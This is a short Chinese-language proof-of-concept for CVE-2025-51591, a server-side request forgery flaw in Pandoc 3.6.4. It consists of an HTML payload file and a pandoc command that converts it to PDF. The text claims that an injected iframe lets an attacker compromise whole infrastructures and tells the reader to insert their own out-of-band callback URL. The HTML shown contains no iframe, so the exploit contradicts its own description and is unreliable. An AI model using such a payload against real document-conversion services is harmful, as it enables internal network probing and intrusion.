JGM Pandoc v3.6.4 中存在服务器端请求伪造(SSRF)漏洞,攻击者可通过注入精心构造的 iframe 来获取访问权限并入侵整个基础设施。
⚠️ 请将 iframe 的 URL 替换为你自己的 OAST URL。⚠️
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>CVE-2025-51591 Proof Of Concept</title>
</head>
<body>
<h1>
CVE-2025-51591 Proof Of Concept
</h1>
</body>
</html>
pandoc payload.html -o output1.pdf